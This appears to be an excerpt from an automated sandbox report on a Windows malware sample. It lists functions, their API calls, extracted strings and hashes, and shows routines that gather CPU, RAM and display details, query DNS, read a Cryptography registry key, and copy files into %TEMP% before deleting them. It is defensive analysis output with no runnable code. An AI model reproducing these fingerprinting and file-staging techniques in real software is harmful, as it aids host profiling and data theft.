Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58

Function 00416748 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Video Info, xrefs: 00416856
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
GetRAM: , xrefs: 00416833
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Model: , xrefs: 0041677E
CPU Count: , xrefs: 004167EF

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58

Function 00403368 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0

Strings

Runtime error at 00000000, xrefs: 0040339A, 004033D9
Error, xrefs: 004033D4

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D

Function 00402668 Relevance: 11.4, APIs: 9, Instructions: 109COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D

Function 00410E70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
DeleteFileW.KERNEL32(00000000), ref: 004110EC

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF
, xrefs: 00411078

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp
API String ID: 2381671008-2792595090
Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58

Function 0040B15C Relevance: 9.2, APIs: 6, Instructions: 198libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8

Function 00401934 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D

Function 00410BB8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
DeleteFileW.KERNEL32(00000000), ref: 00410DBE

Strings

.tmp, xrefs: 00410C18
%TEMP%, xrefs: 00410C38

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58

Function 00410900 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410945
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
DeleteFileW.KERNEL32(00000000), ref: 00410B06

Strings

%TEMP%, xrefs: 00410980
.tmp, xrefs: 00410960

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58

Function 00402AC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

Strings

FPUMaskValue, xrefs: 00402B10
SOFTWARE\Borland\Delphi\RTL, xrefs: 00402ADC

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C

Function 00416584 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Strings

@, xrefs: 004165C7
kernel32.dll, xrefs: 004165A6
GlobalMemoryStatusEx, xrefs: 004165A1

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryLoadProcString
String ID: @$GlobalMemoryStatusEx$kernel32.dll
API String ID: 923276998-3878206809
Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C

Function 00406654 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677

Strings

IsWow64Process, xrefs: 00406656
kernel32.dll, xrefs: 0040665B

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D

Function 00410E58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58

Function 00410E60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58

Function 00410E68 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58

Function 00410BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79

Strings

.tmp, xrefs: 00410C18
%TEMP%, xrefs: 00410C38

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58

Function 00410BB4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79

Strings

.tmp, xrefs: 00410C18
%TEMP%, xrefs: 00410C38

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58

Function 0040DDB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A

Strings

LLA, xrefs: 0040DE19, 0040DE26
%TEMP%\curbuf.dat, xrefs: 0040DE1C, 0040DE44, 0040DE67

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: File$AllocCopyDeleteString
String ID: %TEMP%\curbuf.dat$LLA
API String ID: 5292005-3909751444
Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99

Function 00417E78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58

Function 00417E7C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58

Function 00416644 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E

Strings

EnumDisplayDevicesW, xrefs: 0041666E
user32.dll, xrefs: 00416673

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumDisplayDevicesW$user32.dll
API String ID: 2574300362-1693391355
Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58

Function 00417E80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58

Function 004394C8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004394EE

Part of subcall function 004392D6: __fltout2.LIBCMT ref: 00439302

__cftog_l.LIBCMT ref: 00439514
__cftoe_l.LIBCMT ref: 00439546

Memory Dump Source

